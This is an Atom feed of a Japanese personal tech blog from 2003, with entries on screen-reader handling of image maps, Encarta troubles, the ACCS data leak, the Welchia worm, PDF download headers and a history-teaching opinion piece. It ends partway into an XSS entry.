/></span>は、通常のモードでイメージマップに出会うと「2個のマップの先頭。」などと読み上げて、イメージマップがあることだけを伝えて読み飛ばします。イメージマップ内の各リンクを利用したい場合は、行読み上げモードやリンク読み上げモードを使用します。</p><p>モードを変えて改めて読み上げると、イメージマップ内の各 area をそれぞれ <dfn class="element"><a href="../../ref/html/element/a">a要素</a></dfn>と同じようにして読み上げて行きます。</p><p>ここまでは問題ありません。しかし、area に nohref 属性が指定され、かつ alt 属性に空でない値が指定されていると問題が起きます。そのような area は他の area と全く同じように読み上げられるのですが、リンクをたどろうとしたところで初めて「リンクがありません」と言われてしまうのです。</p><p>これは混乱を招くので、nohref には気をつけた方が良いかも知れません。nohref には常に alt="" を指定するようにすればある程度避けられますが、その場合でも「n個のマップの先頭」と読み上げられる n の数と実際のリンクの個数が食い違うという問題が起きます。</p><p class="note">※また、既知だと思いますが一応書いておくと、「altのないイメージを通知する」が有効でない場合、alt="" の指定されている area は全く利用できなくなります。</p><p class="note">※2003-12-12 追記 : alt="" が指定されているのではなく、alt 属性自体がない場合は URL が読まれるようです。ロックマンさんご指摘ありがとうございます。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/1002/comment">「ホームページ・リーダーでイメージマップを読む」へのコメント (7件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%A2%E3%82%AF%E3%82%BB%E3%82%B7%E3%83%93%E3%83%AA%E3%83%86%E3%82%A3">アクセシビリティ</a> / <a href="../genre/UA">UA</a> / <a href="../genre/%E3%83%9B%E3%83%BC%E3%83%A0%E3%83%9A%E3%83%BC%E3%82%B8%E3%83%BB%E3%83%AA%E3%83%BC%E3%83%80%E3%83%BC">ホームページ・リーダー</a></span></p></div></div></content></entry><entry><title>戦争は「悪」ではない</title><link href="http://bakera.jp/ebi/topic/103" /><id>tag:bakera.jp,2008:/ebi/topic/103</id><updated>2003-12-04T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2001/11/5">2001年11月5日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/103">戦争は「悪」ではない</a></h2><p class="subinfo"><span class="updated">更新: 2003年12月4日</span></p><p>で、墓場に書いた話ですが、どうしてこんなあたりまえの事を？ というのが私の感想です。全ての戦争は「正義」であると断言しても良いと思います。何故って、「悪」のための戦争なんてのは国際的にはもとより、国内でも誰にも支持されないからです。たとえ専制政治が行われていたとしても、支持者が一人もいない状態で戦争が行われることは絶対にありません。あえて断言しますが、全ての戦争は「正義」のために行われます。例外はありません。</p><p class="note">※ちなみに、これは国家を挙げて行われる「戦争」の話であって、個人レベルの「テロ」はまた別。国際テロ組織のような規模になると、国家と同じことが言えたりしますが。</p><p>第二次大戦のナチス・ドイツの思想などは狂気のように思われているかもしれませんが、私はそうは思いません。ヒトラーの目指した、優れたアーリア人国家建設のための優性思想は、(共感できるかどうかはともかく)理性的に理解可能なものです。実際、それを理解し共感する人がいなかったのなら、国を挙げてユダヤ人狩りを行うことなど出来はしなかったでしょう。</p><p>日本の場合も同様です。15年戦争は、当初の開戦のいきさつはともかくとして、少なくとも表向きはアジア解放、八紘一宇の理想社会を目指した崇高なものとされていたのでした。国民や兵士たちは、この崇高な目的に向かって行ったのです。自分たちの行為を「開放」ではなく侵略や虐殺だと思っていた兵士は、いたかもしれませんが多くはなかったでしょう。<em class="note">※って、いたとしても、言えなかったけど。</em></p><p>ついでに言うと、原爆投下は、その悲惨な戦争を終わらせるためのもので、これまた「正義」に基づいた行動でした。</p><p>……で、その結果どうなったかというと、これはまあ言うまでもないわけで。</p><p>「<q>歴史を学ぶのは、過去の事実について、過去の人がどう考えていたかを学ぶことなのである</q>」というのは例の扶桑社の教科書の前書きの一説ですが、このように考えてみると、この前書きの持つ意味が良く分かると思います。</p><p class="note">※2003-12-04 追記 : はっきり書いてしまうと、「過去の人がどう考えていたか」という観点に立てば「当時の人はこのように戦争を支持した」ということがいくらでも出てくるわけで、いくらでも戦争を美化できるということです。むしろ後世から見て「間違いだった」と思えるようなことを繰り返さないために歴史を学ぶ必要があるのだと、私は思っています。</p><ul class="comment-link"><li><a href="../topic/103/comment">「戦争は「悪」ではない」へのコメント (7件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E6%80%9D%E3%81%A3%E3%81%9F%E3%81%93%E3%81%A8">思ったこと</a> / <a href="../genre/%E6%94%BF%E6%B2%BB">政治</a> / <a href="../genre/%E6%80%9D%E6%83%B3">思想</a></span></p></div></div></content></entry><entry><title>エンカルタで八方ふさがり</title><link href="http://bakera.jp/ebi/topic/317" /><id>tag:bakera.jp,2008:/ebi/topic/317</id><updated>2003-12-02T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2002/4/25">2002年4月25日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/317">エンカルタで八方ふさがり</a></h2><p class="subinfo"><span class="updated">更新: 2003年12月2日</span></p><p>結局、何をやってもエンカルタと Bookshelf は再起不能。復元でだいぶ前の時点まで戻してみてもダメ、チェックディスクも実行してみましたが異常なし。八方ふさがりです。</p><p>状況としては、</p><ul><li>Bookshelf のほとんどの項目が表示できない。表示しようとすると音が鳴って真っ白な画面になる。しかし表示できる項目もあって、たとえば「ア」の項は表示できるが「あ」は表示できない。辞書の種類(国語、和英、英和、英英)には依存せず、どの辞書でも表示できる項目と表示できない項目がある。そして表示できない項目の方が多い。</li><li>エンカルタの項目が全く表示できない。表示しようとすると、IE のエラー画面が出る(これはおそらくエンカルタが IE のコンポーネントを使っているため。ちなみに<a href="../../shared/images/ebi/deadencarta.png">エンカルタ死亡画面</a>も取ってあります)。地図の参照などはできるが、項目は全くだめ。表紙も表示できない。</li></ul><p>これらをインストールしたり再インストールしたりしましたが、何をしても上記の症状が再現。ちなみに他のソフトウェアには異常ありません。いったい何が起きているのでしょうか。マジで謎です。</p><p class="note">※2003-12-02 こっちにも追記 : 実はこの現象は IE のキャッシュ破損が原因です。IE のキャッシュをクリアすれば直りますが、当時はそんなことは知らなかったので頑張って何度も再インストールしました。エンカルタや Bookshelf を再インストールしても IE のキャッシュは修復されないので、この現象からは回復しません。</p><ul class="comment-link"><li><a href="../topic/317/comment">「エンカルタで八方ふさがり」へのコメント (12件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E5%87%BA%E6%9D%A5%E4%BA%8B">出来事</a> / <a href="../genre/%E3%82%B3%E3%83%B3%E3%83%94%E3%83%A5%E3%83%BC%E3%82%BF">コンピュータ</a> / <a href="../genre/Microsoft">Microsoft</a> / <a href="../genre/%E3%82%A8%E3%83%B3%E3%82%AB%E3%83%AB%E3%82%BF">エンカルタ</a> / <a href="../genre/Bookshelf">Bookshelf</a></span></p></div></div></content></entry><entry><title>「実害なし」に対抗するために</title><link href="http://bakera.jp/ebi/topic/944" /><id>tag:bakera.jp,2008:/ebi/topic/944</id><updated>2003-11-20T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/11/12">2003年11月12日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/944">「実害なし」に対抗するために</a></h2><p class="subinfo"><span class="updated">更新: 2003年11月20日</span></p><div class="quote-and-cite"><blockquote cite="http://www.mainichi.co.jp/digital/network/archive/200311/11/3.html"><p>情報流出を指摘した男性は、延べ約1200人分の個人情報を提示し、セキュリティー上の問題点を指摘してきたという。同協会では、提示された情報を内部情報と確認した。流出した情報は、投稿者が書き込んだ情報そのままの状態で、ハンドルネームの場合もあったという。</p></blockquote><p class="cite">以上、Mainichi INTERACTIVE　ネットワークの<a href="http://www.mainichi.co.jp/digital/network/archive/200311/11/3.html">延べ約1200人分の個人情報流出　ACCS</a> より</p></div><p>なるほど、獲得した個人情報の実物を提示してやれば「実害なし」なんて言われないですね。<ruby><rb>流石</rb><rp>(</rp><rt>さすが</rt><rp>)</rp></ruby>です。</p><p>ACCS の方にはお詫びが出ていて、</p><div class="quote-and-cite"><blockquote cite="http://www.askaccs.ne.jp/houkoku1.html"><p>11月9日に、ある個人の方から、「ASK ACCSのホームページ上から個人情報を入手できる」との指摘のメールをいただき、ACCSで確認したところ、この方がメールに添付していた個人情報が、ACCSの保有している情報と同一であると判明したことが発端です。この事実を確認した時点でACCSでは、問題のあった「ASK ACCS」のCGI機能を停止するなど、技術面での緊急措置を実施したほか、そのメールをいただいた方と連絡を取りながら、更に詳しい事実の調査を進めています。</p></blockquote><p class="cite">以上、<a href="http://www.askaccs.ne.jp/houkoku1.html">ASK ACCS TOP</a> より</p></div><p>……と、「メールをいただいた方」と積極的に協力している感じの物言いなのですが、肝心の「メールをいただいた方」の方では</p><div class="quote-and-cite"><blockquote cite="http://www.office.ac/tearoom/noframe.cgi#No.1613"><p>ACCSを名乗る怪しいメールが（複数種）来ます</p><p>差出人不祥（発信元ドメインが関係者とは思えない）のメールが来て</p><p>「電話を*****までよこせ」</p><p>とか</p><p>「個人情報データを削除しろ」</p><p>とか要求してきます。いったいこの人達は何なんでしょうか？</p><p>とてもコワイです。</p></blockquote><p class="cite">以上、officeさんの<a href="http://www.office.ac/tearoom/noframe.cgi#No.1613">Tea Room for Conference in academic office</a> より</p></div><p>……という受け止め方をされているようで、なかなか面白いです。</p><p class="note">※いや面白がってる場合じゃないか。</p><p class="note">※2003-11-20 追記 : office さんのところに <a href="http://www.office.ac/tearoom/noframe.cgi#No.#1613-1"> 【ファーストサーバが配布した、不適切な情報公開をしてしまうcgi問題について】</a> <em class="domain-info">(www.office.ac)</em>というのが出ています。ACCS からのメールについては誤解だったそうで。</p><ul class="comment-link"><li><a href="../topic/944/comment">「「実害なし」に対抗するために」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/ACCS">ACCS</a> / <a href="../genre/ASK%20ACCS%20%E5%80%8B%E4%BA%BA%E6%83%85%E5%A0%B1%E6%BC%8F%E6%B4%A9%E4%BA%8B%E4%BB%B6">ASK ACCS 個人情報漏洩事件</a> / <a href="../genre/%E6%83%85%E5%A0%B1%E6%BC%8F%E6%B4%A9">情報漏洩</a></span></p></div></div></content></entry><entry><title>Pockey-GetHTML</title><link href="http://bakera.jp/ebi/topic/926" /><id>tag:bakera.jp,2008:/ebi/topic/926</id><updated>2003-10-31T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/10/30">2003年10月30日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/926">Pockey-GetHTML</a></h2><p class="subinfo"><span class="updated">更新: 2003年10月31日</span></p><p>Pockey-GetHTML ってのはダウンロードツールなのでしょうか。サーバが異様に重いと思ったら、これがものすごい勢いでいらっしゃっているようで。いちおうアクセスの間隔は 6秒くらい置いてくれているようなのですが、それでも厳しいです。勘弁してください。</p><p class="note">※というか、hatomaru.dll 側のアルゴリズムを見直す必要に迫られているのかなぁ。</p><p class="note">※2003-10-31 追記: <a href="http://hp.vector.co.jp/authors/VA014425/gethtmlw.html">GetHTMLW</a> <em class="domain-info">(hp.vector.co.jp)</em> というソフトが出力する User-Agent のようです。y-Aki さん情報ありがとうございます。</p><ul class="comment-link"><li><a href="../topic/926/comment">「Pockey-GetHTML」へのコメント (3件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/UA">UA</a></span></p></div></div></content></entry><entry><title>dloader が Googlebot 化?</title><link href="http://bakera.jp/ebi/topic/794" /><id>tag:bakera.jp,2008:/ebi/topic/794</id><updated>2003-08-25T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/8/21">2003年8月21日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/794">dloader が Googlebot 化?</a></h2><p class="subinfo"><span class="updated">更新: 2003年8月25日</span></p><p><a href="http://www.office.ac/tearoom/noframe.cgi">officeさんのところ</a> <em class="domain-info">(www.office.ac)</em>を見ていたら、Naver のロボットが "GoogleBot" を詐称するようになったとかいう話題が。</p><p>ネタ元の<a href="http://sho.tdiary.net/20030820.html#p01">ただのにっき(2003-08-20)</a> <em class="domain-info">(sho.tdiary.net)</em>を見ると、こんな感じのリクエストなのだそうで。</p><div class="quote-and-cite"><blockquote cite="http://sho.tdiary.net/20030820.html#p01"><p>220.73.165.139 (中略) "GET /robots.txt HTTP/1.0" 200 548 "-" "GoogleBot"</p></blockquote><p class="cite">以上、ただただしさんの<a href="http://sho.tdiary.net/20030820.html#p01">ただのにっき(2003-08-20)</a> より</p></div><p>"dloader" を名乗ると蹴られちゃうサーバが増えてきたから、なのかしら。だとすると何かが根本的に間違っているような気がしますが……。</p><ins datetime="2003-08-25"><p class="note">※2003-08-25 追記 : どうも GoogleBot を名乗るのは /robots.txt を取りに来るときだけで、通常のリクエストはやはり dloader のようです。そうなるとロボット除けを回避する意図でもなさそうなのですが、ではどうして GooglBot などと名乗るのかは不明。</p></ins><p>とりあえず本物の Googlebot は "Googlebot/2.1" という具合に名乗っているので、</p><ul><li>b が大文字になっている</li><li>バージョンがついていない</li></ul><p>という点で区別できそうではあります。</p><ul class="comment-link"><li><a href="../topic/794/comment">「dloader が Googlebot 化?」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/UA">UA</a> / <a href="../genre/dloader">dloader</a></span></p></div></div></content></entry><entry><title>私は</title><link href="http://bakera.jp/ebi/topic/724" /><id>tag:bakera.jp,2008:/ebi/topic/724</id><updated>2003-08-25T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/7/18">2003年7月18日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/724">私は</a></h2><p class="subinfo"><span class="updated">更新: 2003年8月25日</span></p><p>えー、この日記の作者は「水無月ばけら」です。「えび」じゃないのです。</p><p>「えび日記さん」と呼んでくださる方がいらっしゃいますが、「中禅寺」という姓の人を「京極堂」と呼んだりするのが間違いでないとするなら、別に間違ってはいないのかもしれません。昔は「鳩丸さん」というのもありましたし……。</p><ins datetime="2003-08-25"><p class="note">※2003-08-25 追記 : ごめんなさい、京極堂さんは「中善寺」じゃなくて「中禅寺」さんでした。謹んで訂正させて頂きます。名前を間違ってるという話題で自分が間違ってどうする。 &gt; わたし</p></ins><p>ちなみに、「何でえびなの？」というのは <dfn class="glossary">FAQ</dfn> です。昔は「読めばきっと分かります」と回答していたのですが、それで分かったという人は<dfn class="glossary"><a href="../../glossary/%E3%82%80%E3%82%89%E3%81%BE%E3%81%95%E3%81%95%E3%82%93">むらまささん</a></dfn>くらいしかいないようで。</p><p class="note">※恐ろしく端折って説明すると「水無月英水子」→「えみこちゃん」→「えみちゃん」→「えびちゃん」という出世魚ぶりが発揮された結果なのですが、現在では枝分かれ進化した愛称が使用されているので、少女時代を知らない人には謎となっています。……って、この説明で分かる人も少ないような気がしますが。</p><ul class="comment-link"><li><a href="../topic/724/comment">「私は」へのコメント (9件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%81%88%E3%81%B3%E6%97%A5%E8%A8%98">えび日記</a></span></p></div></div></content></entry><entry><title>.NET Framework 依存コンポーネント</title><link href="http://bakera.jp/ebi/topic/798" /><id>tag:bakera.jp,2008:/ebi/topic/798</id><updated>2003-08-25T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/8/23">2003年8月23日(土曜日)</a></h1><div class="topic"><h2><a href="../topic/798">.NET Framework 依存コンポーネント</a></h2><p class="subinfo"><span class="updated">更新: 2003年8月25日</span></p><p>MS03-032 のパッチを適用したら、さりげなく「セキュリティの設定」の内容も変わっていますね。</p><ins datetime="2003-08-25"><p class="note">※2003-08-25 追記 : えむけいさんによると MS03-032 よりずっと前からあったそうで、単に私が今まで気づいていなかっただけかも知れません。</p></ins><div class="figure"><img src="../img/dotnet-component" alt="「セキュリティの設定」を開くと、頭に「.NET Framework 依存コンポーネント」と称する設定項目が……。" width="410" height="383" /></div><p>「Authenticode で署名したコンポーネントを実行する」「Authenticode で署名しないコンポーネントを実行する」はデフォルトで両方とも有効なのですが、署名しないものの実行が「有効」で良いのかしら。</p><p class="note">※まあ、これは「設定できるようになった」という話で、昔は両方とも強制的に「有効」になっていたので、その設定を引き継いでデフォルト「有効」なのでしょう。</p><p>いずれも .NET Configuration 側のセキュリティポリシーが適用されるから問題ないという話なのかもしれませんが、とりあえず両方とも「ダイアログを表示する」にしてみました。</p><ul class="comment-link"><li><a href="../topic/798/comment">「.NET Framework 依存コンポーネント」へのコメント (8件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/UA">UA</a> / <a href="../genre/Internet%20Explorer">Internet Explorer</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>Blaster亜種</title><link href="http://bakera.jp/ebi/topic/790" /><id>tag:bakera.jp,2008:/ebi/topic/790</id><updated>2003-08-20T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/8/19">2003年8月19日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/790">Blaster亜種</a></h2><p class="subinfo"><span class="updated">更新: 2003年8月20日</span></p><p>MS Blasterワームにはもう亜種が出ているようですね。<a href="http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.D&amp;VSect=T">トレンドマイクロの WORM_MSBLAST.D 詳細</a> <em class="domain-info">(www.trendmicro.co.jp)</em>を見ると、</p><ul><li>ping を撃ってから感染を試みる</li><li>感染すると MS03-026 のパッチを当てる</li><li>2004年になると自分自身を削除する</li></ul><p>という動作をするようです。どうも、Code Red に対する Code Green のような性質のものみたいですね。作者は善意のつもりなのかも知れませんが、いずれにしても迷惑な気が……。</p><p class="note">※追記 : どうもこれは MS Blaster の亜種ではないようです。ポートスキャンのロジックも MS Blaster とは異なりますし、感染のロジックも例の Exploit コードを元に生成したものであって、Blaster を改変したものではないようですね。このワームは Nachi とか Welchia とか呼ばれています。</p><ins datetime="2003-08-20"><p class="note">※2003-08-20 追記 : このワームでは日本語版のパッチは当たらないそうです。日本語環境では迷惑なだけですね……。</p></ins><ul class="comment-link"><li><a href="../topic/790/comment">「Blaster亜種」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%82%B3%E3%83%B3%E3%83%94%E3%83%A5%E3%83%BC%E3%82%BF%E3%82%A6%E3%82%A3%E3%83%AB%E3%82%B9">コンピュータウィルス</a> / <a href="../genre/Welchia">Welchia</a></span></p></div></div></content></entry><entry><title>ギルタ</title><link href="http://bakera.jp/ebi/topic/729" /><id>tag:bakera.jp,2008:/ebi/topic/729</id><updated>2003-08-04T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/7/24">2003年7月24日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/729">ギルタ</a></h2><p class="subinfo"><span class="updated">更新: 2003年8月4日</span></p><p><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/B00005RIW3&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">ポポローグ</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=B00005RIW3" alt="" width="1" height="1" /></span>。あやかしの洞窟でイビルフェイスが落とした宝箱を開けたら、「?つえ?」。ちょうど連れていたイムジーに鑑定してもらうと「ギルタのつえ」でした (まがい物なので「ギルダ」ではなく「ギルタ」で正解)。</p><p>モンスター図鑑にはお宝の欄があって、最大で 2つのアイテムが載ります。欄が 2つ埋まっていて、さらに異なるアイテムが出るのであれば「欄が足りなかったので出ていない」のだと解釈できますが、イビルフェイスのお宝は「ぎんのうでわ」しか出ていないのですよね……。</p><p class="note">※追記: これはおそらくバグです。<a href="../topic/751">ポポローグのバグ その2</a>を参照。</p><p>逆に、「お宝の欄が 1つしか埋まっていないモンスターは、もう一つレアアイテムを持っている」ということになっているのかしら……？ ともあれ、モンスター図鑑に出ていないお宝があり得るということを学習しました。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/729/comment">「ギルタ」へのコメント (2件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%B2%E3%83%BC%E3%83%A0">ゲーム</a> / <a href="../genre/%E3%83%9D%E3%83%9D%E3%83%AD%E3%82%AF%E3%83%AD%E3%82%A4%E3%82%B9">ポポロクロイス</a> / <a href="../genre/%E3%83%9D%E3%83%9D%E3%83%AD%E3%83%BC%E3%82%B0">ポポローグ</a></span></p></div></div></content></entry><entry><title>PDF をダウンロードさせる</title><link href="http://bakera.jp/ebi/topic/739" /><id>tag:bakera.jp,2008:/ebi/topic/739</id><updated>2003-07-30T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/7/29">2003年7月29日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/739">PDF をダウンロードさせる</a></h2><p class="subinfo"><span class="updated">更新: 2003年7月30日</span></p><div class="quote-and-cite"><blockquote cite="http://www.usability.gr.jp/alertbox/20030728.html"><p>PDF ファイルをブラウザ内で開くわずらわしさを回避しつつダウンロードする手順も掲載しておくといいだろう。残念ながら、現状のテクノロジーでは、これは一般ユーザには難しい操作だ。ファイルを表示しないでダウンロードする特殊なリンクが作れるようになるといいのだが。 </p></blockquote><p class="cite">以上、<a href="http://www.usability.gr.jp/alertbox/20030728.html">Alertbox: PDF ショックの防止にはゲートウェイ・ページを</a> より</p></div><p>PDF の Content-Type: が application/octet-stream になるようにしておけば、勝手にダウンロードになったりしないでしょうか。そんなに難しい対処ではないと思いますが。</p><p>それとも、例によって IE が Content-Type を無視して自動判別の結果を優先したりするのでしょうか。PDF まで自動判別するのかしら？ 手元に適切な PDF のリソースがないので試せないですが……。</p><p class="note">※追記 : yuuさんからテスト用の PDF ドキュメントを頂きました。ありがとうございます。そんなわけで、<a href="../../downloads/ebitest.pdf">application/octet-stream な PDF へのリンク</a>。試してみましたが、やっぱり MSIE6 は Content-Type を無視して PDF として表示しようとするみたいですね。とほほほ……。Content-Type 無視はセキュリティ上の問題にもなりますから、本当に何とかしてもらいたいものですが。</p><p class="note">※2003-07-30 追記 : Content-disposition: attachment を付けるとダウンロードになるのではないかというご指摘を頂きました (えむけいさん、yuuさんありかとうございます)。そんなわけで、<a href="../../downloads/ebitest2.pdf">application/octet-stream かつ Content-disposition: attachment な PDF へのリンク</a>。……おお、確かにダウンロードになりますね！ これで Jakob さんも安心。</p><ul class="comment-link"><li><a href="../topic/739/comment">「PDF をダウンロードさせる」へのコメント (22件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%A2%E3%82%AF%E3%82%BB%E3%82%B7%E3%83%93%E3%83%AA%E3%83%86%E3%82%A3">アクセシビリティ</a> / <a href="../genre/%E3%83%A6%E3%83%BC%E3%82%B6%E3%83%93%E3%83%AA%E3%83%86%E3%82%A3">ユーザビリティ</a></span></p></div></div></content></entry><entry><title>Bookshelf が再インストールできない</title><link href="http://bakera.jp/ebi/topic/316" /><id>tag:bakera.jp,2008:/ebi/topic/316</id><updated>2003-07-07T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2002/4/24">2002年4月24日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/316">Bookshelf が再インストールできない</a></h2><p class="subinfo"><span class="updated">更新: 2003年7月7日</span></p><ul><li>Bookshelf3.0 で tutorial という単語を調べ、英英辞典を引こうとしたらビープ音が鳴って表示されない。</li><li>他の項目を引いてみると、ほとんどの項目が引けない。いくつかの項目は引けるが法則は不明。</li><li>データ保存場所を圧縮してたのが悪いのかと思って展開してみたがダメ。</li><li>しょーがないので修復インストールを試みる。</li><li>修復したと言われ、再起動して試みるもやはり症状は改善せず。いったんアンインストールして再インストールすることに。</li><li>まずはアンインストール。これはすんなりいった(ように見えた)。</li><li>続いて再インストールしようとする。</li><li>こんなの出た。<div class="figure"><img src="../img/bookshelferror" alt="『Microsoft Bookshelf Basic Version 3 がすでにインストールされています。「コントロールパネル」を起動して、[アプリケーションの追加と削除」から Microsoft Bookshelf Basic Version 3 をアンインストールしてから再度セットアップ プログラムを起動してください。』と言われる。ちなみに [」となって括弧が対応してないのは原文のママ。" width="640" height="125" /></div></li><li>ていうかそんなのインストールしてない！ 一応コントロールパネルを見るが、当然そんな物はない。初代の Bookshelf(Basicじゃない) はあるが問題ないはず。</li><li>念のため、初代 Bookshelf をアンインストールしてみる。</li><li>「Microsoft Bookshelf Basic Version 3 がすでに……」ってまたかよ！</li><li>エンカルタが悪いのだろうか？ しかしエンカルタはデータ多いし再インストールしたくない。調子悪くないし……と思って一応見てみたら、しっかりエンカルタも調子悪くなっていた(ほとんど全ての項目が表示不能)。</li><li>泣く泣くエンカルタもアンインストール。</li><li>で、もう一度 Bookshelf のインストールから試みるが、やはり同じ事を言われてインストールできない。</li><li>ここで regedit。"books" で検索すると [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ReferenceTitles] と [HKEY_CURRENT_USER\Software\Microsoft\Microsoft Reference] 以下にそれっぽいデータがあったので、ばっさりと削除。</li><li>これで大丈夫だろう、と思ったら「Microsoft Bookshelf Basic Version 3 がすでに……」。</li><li>とりあえずエンカルタのみ再インストールしてみる。</li><li>……ダメじゃん！ どの項目も表示できない。エンカルタ死亡(<a href="../../shared/images/ebi/deadencarta.png">エンカルタ死亡画面</a>)。</li><li>わたしゃどうすりゃ良いのよ。</li><li>再インストールしてもダメと言うことはエンカルタ独自の機能が死んでいるのではなく、Windows の共有コンポーネントか何かの問題である可能性が高い。こりゃ Windows XP の目玉機能である「システムの復元」の出番だ！</li><li>昨日の復元ポイントがあったので、復元してみる。昨日は使えてたのだから。</li><li>で、復元はスムーズに終了。デスクトップにエンカルタと Bookshelf のアイコンが復活。</li><li>エンカルタをクリックしてみると、なんかインストーラみたいな物が立ち上がってディスクを要求してきた。入れてやる。4枚のディスクを入れ替わり立ち替わり。</li><li>で、完了して立ち上がったエンカルタは……直ってない！</li><li>とりあえず Bookshelf もクリックしてみると、やはりインストーラのような物が起動。今度は変なことは言われずにインストールできた。</li><li>で、完了して立ち上がった Bookshelf は……直ってない！</li><li>============ 終了 ============</li></ul><p>Windows から再インストールするしかないのでしょうか。</p><p class="note">※2003-07-07 追記 : 実はこの現象は IE のキャッシュ破損が原因です。IE のキャッシュをクリアすれば直りますが、当時はそんなことは知らなかったので頑張って何度も再インストールしました。エンカルタや Bookshelf を再インストールしても IE のキャッシュは修復されないので、この現象からは回復しません。</p><ul class="comment-link"><li><a href="../topic/316/comment">「Bookshelf が再インストールできない」へのコメント (16件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E5%87%BA%E6%9D%A5%E4%BA%8B">出来事</a> / <a href="../genre/%E3%82%B3%E3%83%B3%E3%83%94%E3%83%A5%E3%83%BC%E3%82%BF">コンピュータ</a> / <a href="../genre/Microsoft">Microsoft</a> / <a href="../genre/%E3%82%A8%E3%83%B3%E3%82%AB%E3%83%AB%E3%82%BF">エンカルタ</a> / <a href="../genre/Bookshelf">Bookshelf</a></span></p></div></div></content></entry><entry><title>サニタイズ貫通(XSS大王シリーズ)</title><link href="http://bakera.jp/ebi/topic/688" /><id>tag:bakera.jp,2008:/ebi/topic/688</id><updated>2003-07-04T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/7/2">2003年7月2日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/688">サニタイズ貫通(XSS大王シリーズ)</a></h2><p class="subinfo"><span class="updated">更新: 2003年7月4日</span></p><p>nifty.com 以下のドメインには「パレット」というサービスがあります。この名前からサービスの内容を想像するのはかなり困難ですが、要するに「絵が描ける掲示板」というようなコンセプトだったようです。つまりは HTML タグが使用できる掲示板です。</p><p>私は把握していなかったのですが、かつてはこれにも自由にいろいろ書けてしまったようで、6月30日に、パレットのタグ利用を制限した旨のアナウンスが出ています。</p><div 